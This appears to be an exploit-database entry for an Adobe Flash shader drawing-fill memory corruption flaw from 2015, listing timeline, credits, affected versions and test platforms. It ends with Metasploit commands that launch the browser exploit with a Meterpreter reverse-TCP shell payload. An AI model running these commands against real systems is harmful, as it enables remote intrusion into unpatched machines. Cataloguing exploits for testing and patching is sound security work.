Timeline :
Vulnerability discovered and reported to the vendor by Chris Evans of Google Project Zero
Patch provided by the vendor via APSB15-11 the 2015-06-09
Vulnerability discovered exploited in the Exploit Kits the 2015-06-16
Metasploit PoC provided the 2015-06-25
PoC provided by :
Chris Evans
Unknown
juan vazquez
Reference(s) :
Affected version(s) :
Adobe Flash Player 16.0.0.305 and earlier versions
Adobe Flash Player 11.2.202.442 and earlier 11.x versions
Tested on :
Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188
Description :
This module exploits a memory corruption happening when applying a Shader as a drawing fill as exploited in the wild on June 2015. This module has been tested successfully on:
* Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.
Commands :
use exploit/multi/browser/adobe_flash_shader_drawing_fill set SRVHOST 192.168.6.138 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.6.138 run getuid sysinfo